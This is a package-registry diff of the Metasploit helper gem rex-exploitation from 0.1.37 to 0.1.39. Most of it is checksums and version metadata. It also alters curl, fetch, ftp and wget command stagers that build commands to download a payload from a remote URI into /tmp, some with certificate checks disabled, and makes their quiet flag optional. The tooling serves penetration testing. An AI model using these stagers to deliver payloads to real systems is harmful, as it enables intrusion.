rex-exploitation 0.1.37 → 0.1.39

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (11) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data/cortex.yaml +15 -0
  4. data/lib/rex/exploitation/cmdstager/curl.rb +4 -2
  5. data/lib/rex/exploitation/cmdstager/fetch.rb +4 -2
  6. data/lib/rex/exploitation/cmdstager/ftp_http.rb +4 -1
  7. data/lib/rex/exploitation/cmdstager/wget.rb +4 -2
  8. data/lib/rex/exploitation/version.rb +1 -1
  9. data.tar.gz.sig +0 -0
  10. metadata +3 -2
  11. metadata.gz.sig +1 -1
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: efae7e0ffa11f8cad37036f3db9ae9144cc1895a9e90111b585ad750f07ea822
4
- data.tar.gz: 3dfa6dc1ca737e7011efc806ed321edc3a44085f79fbfa47b483bdb863f729da
3
+ metadata.gz: 8ef72cba0536238799b96a89b69cfefd84c8732ca35c9eb7dd6e259850953a23
4
+ data.tar.gz: 2cf156e9669cad115b7b671661efffa6e71d3e746b2808be61b82d872e4556e2
5
5
  SHA512:
6
- metadata.gz: a20d86a1cc4e33206805788655793535d138dd78c95d76d9d335364b66b57c2b75931e7ed28fe04bd65105067fd39c608b5d655c9ccf6396baff358bc6b263fa
7
- data.tar.gz: 072161c900ebda55d788513db71838b3f0510c48b5f1cd6fa9239e19db0bbe49c59e21b28843b03d8de58b8cb1eed8795edb3a77b7c06b216f1b1001168c1328
6
+ metadata.gz: 272e99cda9c7fd16d30f9d4138a08c3e1521591c01e3fe1d91389279846775298e334671550cdb0b731f171df7f067562c6caf7bc0bf04e8ac7596607bc432a3
7
+ data.tar.gz: e528c225a015011b89622f3017f226e64e6184b8945128baba71482d7730407a2ce6c54d68299ed69419f831f3c8ff8e611ff8ed7ecf75c14c0e70791373f596
checksums.yaml.gz.sig CHANGED
Binary file
data/cortex.yaml ADDED
@@ -0,0 +1,15 @@
1
+ ---
2
+ info:
3
+ title: Rex Exploitation
4
+ description: Rex library for various exploitation helpers
5
+ x-cortex-git:
6
+ github:
7
+ alias: r7org
8
+ repository: rapid7/rex-exploitation
9
+ x-cortex-tag: rex-exploitation
10
+ x-cortex-type: service
11
+ x-cortex-domain-parents:
12
+ - tag: metasploit
13
+ openapi: 3.0.1
14
+ servers:
15
+ - url: "/"
data/lib/rex/exploitation/cmdstager/curl.rb CHANGED
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
17
17
 
18
18
  opts[:temp] ||= '/tmp'
19
19
  opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ opts[:silent] = true if opts[:silent].nil?
20
21
  @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
22
 
22
23
  super
@@ -25,12 +26,13 @@ class Rex::Exploitation::CmdStagerCurl < Rex::Exploitation::CmdStagerBase
25
26
  def generate_cmds_payload(opts)
26
27
  cmds = []
27
28
  uri = opts[:payload_uri]
29
+ silent_flag = opts[:silent] ? 's' : ''
28
30
 
29
31
  if opts[:ssl]
30
- cmds << "curl -kso #{@payload_path} #{uri}"
32
+ cmds << "curl -#{silent_flag}ko #{@payload_path} #{uri}"
31
33
  else
32
34
  uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
33
- cmds << "curl -so #{@payload_path} #{uri}"
35
+ cmds << "curl -#{silent_flag}o #{@payload_path} #{uri}"
34
36
  end
35
37
 
36
38
  cmds
data/lib/rex/exploitation/cmdstager/fetch.rb CHANGED
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
17
17
 
18
18
  opts[:temp] ||= '/tmp'
19
19
  opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ opts[:silent] = true if opts[:silent].nil?
20
21
  @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
22
 
22
23
  super
@@ -26,10 +27,11 @@ class Rex::Exploitation::CmdStagerFetch < Rex::Exploitation::CmdStagerBase
26
27
  cmds = []
27
28
  nvp = '--no-verify-peer'
28
29
 
30
+ silent_flag = opts[:silent] ? 'q' : ''
29
31
  if opts[:ssl]
30
- cmds << "fetch -qo #{@payload_path} #{nvp} #{opts[:payload_uri]}"
32
+ cmds << "fetch -#{silent_flag}o #{@payload_path} #{nvp} #{opts[:payload_uri]}"
31
33
  else
32
- cmds << "fetch -qo #{@payload_path} #{opts[:payload_uri]}"
34
+ cmds << "fetch -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"
33
35
  end
34
36
 
35
37
  cmds
data/lib/rex/exploitation/cmdstager/ftp_http.rb CHANGED
@@ -17,14 +17,17 @@ class Rex::Exploitation::CmdStagerFtpHttp < Rex::Exploitation::CmdStagerBase
17
17
 
18
18
  opts[:temp] ||= '/tmp'
19
19
  opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ opts[:silent] = true if opts[:silent].nil?
20
21
  @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
22
 
22
23
  super
23
24
  end
24
25
 
25
26
  def generate_cmds_payload(opts)
27
+ # -V: disable verbose output (quiet mode)
28
+ silent_flag = opts[:silent] ? 'V' : ''
26
29
  # -o: output file name (argument must be before URL)
27
- ["ftp -o #{@payload_path} #{opts[:payload_uri]}"]
30
+ ["ftp -#{silent_flag}o #{@payload_path} #{opts[:payload_uri]}"]
28
31
  end
29
32
 
30
33
  def generate_cmds_decoder(opts)
data/lib/rex/exploitation/cmdstager/wget.rb CHANGED
@@ -17,6 +17,7 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
17
17
 
18
18
  opts[:temp] ||= '/tmp'
19
19
  opts[:file] ||= Rex::Text.rand_text_alpha(8)
20
+ opts[:silent] = true if opts[:silent].nil?
20
21
  @payload_path = "#{opts[:temp]}/#{opts[:file]}"
21
22
 
22
23
  super
@@ -27,12 +28,13 @@ class Rex::Exploitation::CmdStagerWget < Rex::Exploitation::CmdStagerBase
27
28
 
28
29
  uri = opts[:payload_uri]
29
30
  ncc = '--no-check-certificate'
31
+ silent_flag = opts[:silent] ? 'q' : ''
30
32
 
31
33
  if opts[:ssl]
32
- cmds << "wget -qO #{@payload_path} #{ncc} #{uri}"
34
+ cmds << "wget -#{silent_flag}O #{@payload_path} #{ncc} #{uri}"
33
35
  else
34
36
  uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
35
- cmds << "wget -qO #{@payload_path} #{uri}"
37
+ cmds << "wget -#{silent_flag}O #{@payload_path} #{uri}"
36
38
  end
37
39
 
38
40
  cmds
data/lib/rex/exploitation/version.rb CHANGED
@@ -1,5 +1,5 @@
1
1
  module Rex
2
2
  module Exploitation
3
- VERSION = "0.1.37"
3
+ VERSION = "0.1.39"
4
4
  end
5
5
  end
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: rex-exploitation
3
3
  version: !ruby/object:Gem::Version
4
- version: 0.1.37
4
+ version: 0.1.39
5
5
  platform: ruby
6
6
  authors:
7
7
  - Metasploit Hackers
@@ -93,7 +93,7 @@ cert_chain:
93
93
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
94
94
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
95
95
  -----END CERTIFICATE-----
96
- date: 2023-01-31 00:00:00.000000000 Z
96
+ date: 2023-10-04 00:00:00.000000000 Z
97
97
  dependencies:
98
98
  - !ruby/object:Gem::Dependency
99
99
  name: rake
@@ -226,6 +226,7 @@ files:
226
226
  - Rakefile
227
227
  - bin/console
228
228
  - bin/setup
229
+ - cortex.yaml
229
230
  - data/exploits/cmdstager/debug_asm
230
231
  - data/exploits/cmdstager/debug_write
231
232
  - data/exploits/cmdstager/vbs_b64
metadata.gz.sig CHANGED
@@ -1 +1 @@
1
- i��-��S��7g{�)>Qha^S_7��2S��J��PR���N���m���I݆j4�i`�D�ly�˸�}���<P8r�t枂�)��YxӬP�I�7��/À���q�"��'����b���M؀H��&�!�xE>�/�,�X)��yכ� fq�C_F� ��M]Ѳ����$@��YQ�#5is1G�κ�3G��n^��H����] 賓,?_��n���6� �[Qۋ0��=���B�eTU��d�
1
+ ��